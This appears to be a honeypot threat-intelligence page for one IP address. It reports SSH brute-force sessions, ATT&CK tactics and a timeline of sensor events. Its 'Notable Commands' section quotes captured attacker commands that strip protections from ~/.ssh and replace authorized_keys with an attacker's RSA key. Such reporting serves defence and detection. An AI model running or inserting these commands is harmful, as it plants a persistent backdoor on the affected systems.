123.58.203.202

TAGGED SUSPICIOUS
Threat Confidence
67%
Location
🇮🇳 IN / Mumbai
ASN
AS135377 · UCLOUD INFORMATION TECHNOLOGY HK LIMITED
Cloud Provider
Total Events
242
Above average by volume
Agent Count
2
First / Last Seen
2026-05-22 02:41 — 2026-06-01 06:47
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Defense Evasion
Credential Access
Command and Control
External Corroboration
Blocklist.de
Reported 2026-06-01 09:03
blocklist_de:reported
Session Forensics
malware_dropper ×9 credential_probe ×16 opportunistic_bruter ×9
Sessions
34 (18 with login)
Avg Depth Score
0.49
Commands Executed
27
Files Downloaded
9
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
SSH-2.0-libssh_0.9.6
Evidence Timeline
Opportunistic Bruter a6d9d58d44a6 w4m_singapore_01 · 2026-06-01 06:47
1 50%
Malware Dropper 9d248f008ef5 w4m_singapore_01 · 2026-06-01 06:47
3 1 1 100%
Credential Probe cc93b26c5b84 w4m_singapore_01 · 2026-06-01 06:47
1 20%
Credential Probe 31ef8eca0236 w4m_singapore_01 · 2026-06-01 06:45
1 20%
Opportunistic Bruter 1be71893530c w4m_singapore_01 · 2026-06-01 06:43
1 50%
Malware Dropper 44126957c8c6 w4m_singapore_01 · 2026-06-01 06:43
3 1 1 100%
Credential Probe bee48c4db847 w4m_singapore_01 · 2026-06-01 06:43
1 20%
Credential Probe 62fb55575a90 w4m_singapore_01 · 2026-06-01 06:42
1 20%
Opportunistic Bruter 5094d7154ee1 w4m_singapore_01 · 2026-06-01 06:40
1 50%
Malware Dropper 240ddff7d6b6 w4m_singapore_01 · 2026-06-01 06:40
3 1 1 100%
Credential Probe 8944452f151d w4m_singapore_01 · 2026-06-01 06:40
1 20%
Opportunistic Bruter 53c15b91bf1b w4m_singapore_01 · 2026-06-01 06:39
1 50%
Malware Dropper 70dc7fd820cc w4m_singapore_01 · 2026-06-01 06:39
3 1 1 100%
Credential Probe 0a99f68f7d7e w4m_singapore_01 · 2026-06-01 06:39
1 20%
Credential Probe c17451725826 w4m_singapore_01 · 2026-06-01 06:37
1 20%
Credential Probe 9e2f6ee14dbf w4m_singapore_01 · 2026-06-01 06:36
1 20%
Opportunistic Bruter da4b99df6d34 w4m_singapore_01 · 2026-06-01 06:34
1 50%
Malware Dropper 5d53c3b92b3f w4m_singapore_01 · 2026-06-01 06:34
3 1 1 100%
Credential Probe 0a824134c282 w4m_singapore_01 · 2026-06-01 06:34
1 20%
Opportunistic Bruter 9b6134e07f2b w4m_singapore_01 · 2026-06-01 06:33
1 50%
Malware Dropper 7bc70efdf474 w4m_singapore_01 · 2026-06-01 06:33
3 1 1 100%
Credential Probe 3911d163a522 w4m_singapore_01 · 2026-06-01 06:33
1 20%
Opportunistic Bruter 791fa376f406 w4m_singapore_01 · 2026-06-01 06:31
1 50%
Malware Dropper 3e08f3096cab w4m_singapore_01 · 2026-06-01 06:31
3 1 1 100%
Credential Probe 72e3a7c39977 w4m_singapore_01 · 2026-06-01 06:31
1 20%
Opportunistic Bruter 2e90dbd1c918 w4m_singapore_01 · 2026-06-01 06:30
1 50%
Malware Dropper aedce041b3b3 w4m_singapore_01 · 2026-06-01 06:30
3 1 1 100%
Credential Probe 3954fc131139 w4m_singapore_01 · 2026-06-01 06:30
1 20%
Credential Probe 9c107f62259b w4m_singapore_01 · 2026-06-01 06:28
1 20%
Credential Probe 8be14ee8b6ca w4m_singapore_01 · 2026-06-01 06:26
1 20%
Credential Probe 897b07df5d52 w4m_singapore_01 · 2026-06-01 06:20
1 20%
Opportunistic Bruter 721b62a51df8 w4m_seattle_01 · 2026-05-22 02:41
1 50%
Malware Dropper bed30ec82d42 w4m_seattle_01 · 2026-05-22 02:41
3 1 1 100%
Credential Probe 15bac0c12d5d w4m_seattle_01 · 2026-05-22 02:41
1 20%